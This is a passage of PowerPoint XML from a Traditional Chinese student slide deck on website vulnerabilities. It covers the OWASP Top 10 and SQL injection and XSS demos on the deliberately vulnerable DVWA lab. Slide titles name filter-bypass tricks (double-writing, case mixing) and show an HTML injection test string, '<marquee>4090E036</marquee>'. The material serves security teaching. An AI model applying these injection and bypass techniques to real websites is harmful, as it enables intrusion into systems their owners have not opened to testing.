              <a:rPr lang="en-US" altLang="zh-TW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XSS</a:t>
            </a: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不安全的反序列化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使用具有已知漏洞的組件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日誌記錄和監控不足</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://sucuri.net/guides/owasp-top-10-security-vulnerabilities-2021/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982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2617</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>282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3" baseType="lpstr">
      <vt:lpstr>charter</vt:lpstr>
      <vt:lpstr>Noto Sans TC</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>標楷體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Book Antiqua</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Franklin Gothic Medium</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>網站漏洞分析與實務</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>網站的資安威脅 2020</vt:lpstr>
      <vt:lpstr>網站的資安威脅 2020</vt:lpstr>
      <vt:lpstr>網站的資安威脅 2020</vt:lpstr>
      <vt:lpstr>網站的資安威脅 2021</vt:lpstr>
      <vt:lpstr>網站的資安威脅 2021</vt:lpstr>
      <vt:lpstr>網站的資安威脅 2021</vt:lpstr>
      <vt:lpstr>OWASP top 10 2021</vt:lpstr>
      <vt:lpstr>OWASP top 10 2017</vt:lpstr>
      <vt:lpstr>A1 Injection 注入攻擊</vt:lpstr>
      <vt:lpstr>A2 Broken Authentication 無效身分認證</vt:lpstr>
      <vt:lpstr>A3 Sensitive Data Exposure 敏感資料外洩</vt:lpstr>
      <vt:lpstr>A4 XML External Entity, XML 外部處理器漏洞</vt:lpstr>
      <vt:lpstr>A5 Broken Access Control 無效的存取控管</vt:lpstr>
      <vt:lpstr>A6 Security Misconfiguration 不安全的組態設定</vt:lpstr>
      <vt:lpstr>A7 XSS (Cross-Site Scripting) 跨站攻擊</vt:lpstr>
      <vt:lpstr>A8 Insecure Deserialization 不安全的反序列化漏洞</vt:lpstr>
      <vt:lpstr>A9 Using Components with Known Vulnerabilities 使用已有漏洞的元件</vt:lpstr>
      <vt:lpstr>A10 Insufficient Logging &amp; Monitoring  紀錄與監控不足風險</vt:lpstr>
      <vt:lpstr>DVWA實戰環境: Docker</vt:lpstr>
      <vt:lpstr>DVWA Security </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_low</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_Medium </vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_HIGH</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>DVWA_1.10_low</vt:lpstr>
      <vt:lpstr>嘗試輸入各種不正常的input</vt:lpstr>
      <vt:lpstr>各種不正常輸入結果</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PHP漏洞程式碼分析</vt:lpstr>
      <vt:lpstr>如何避免SQL Injection漏洞[1]?</vt:lpstr>
      <vt:lpstr>DVWA_1.10_medium</vt:lpstr>
      <vt:lpstr>DEMO:: SQL Injection</vt:lpstr>
      <vt:lpstr>DEMO:: SQL Injection DVWA_1.10_medium</vt:lpstr>
      <vt:lpstr>DEMO:: SQL Injection DVWA_1.10_high</vt:lpstr>
      <vt:lpstr>DEMO:: SQL Injection SQL Injection Source</vt:lpstr>
      <vt:lpstr>DEMO:: SQL Injection SQL Injection Source</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_low</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_low &lt;marquee&gt;4090E036&lt;/marquee&gt;</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_low 輸入一段Javascript 語法</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_Medium 雙寫繞過的攻擊技術</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_Medium 大小寫混淆繞過的攻擊技術</vt:lpstr>
      <vt:lpstr>學習心得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郁涵 黃</cp:lastModifiedBy>
  <cp:revision>77</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-26T06:28:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-27T06:18:48Z</dcterms:modified>
</cp:coreProperties>
</file>